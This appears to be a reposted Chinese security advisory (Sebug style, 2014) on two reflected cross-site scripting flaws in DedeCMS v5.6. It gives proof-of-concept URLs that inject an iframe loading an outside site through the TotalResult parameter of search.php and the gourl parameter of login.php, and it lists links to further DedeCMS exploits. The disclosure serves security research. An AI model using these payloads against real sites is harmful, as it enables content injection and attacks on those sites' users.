dedecms织梦 v5.6 两处跨站漏洞
2014-03-21 15:32
211 查看
漏洞版本:
dedecms织梦 v5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 demo1:http://www.test.com/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.zhuba.net%3E&PageNo=2 demo2:http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E
<* 参考
*>
测试方法:
@Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.zhuba.net%3E&PageNo=2
http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E
相关文章推荐
- 织梦(Dedecms)V5.6 远程文件删除漏洞
- 织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
- 织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
- 织梦dedecms5.5爆最新漏洞,可得到webshell
- dedecms (织梦)漏洞&exp整理
- 织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- DedeCMS 5.7 config.php 跨站脚本漏洞
- DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
- 织梦DEDECMS search.php注入漏洞EXP[通杀]
- 织梦dedecms漏洞修复大全注入漏洞
- dedecms织梦暴最新严重0day漏洞
- 织梦dedecms漏洞修复记
- 织梦dedecms漏洞修复大全(5.7起)
- Dedecms <= V5.6 Final模板执行漏洞
- dedecms织梦 v5.5 两处跨站漏洞
- 织梦DedeCMS后台模块管理列表不显示 【终极解决办法】
- dedecms织梦系统列表页,频道页获取当前栏目的顶级栏目名称
- 织梦DedeCMS默认友情链接的安全隐患以及处理
- 织梦DedeCMS后台栏目管理处显示未审核文档数量
- 织梦dedecms自定义表单中设置必填项的方法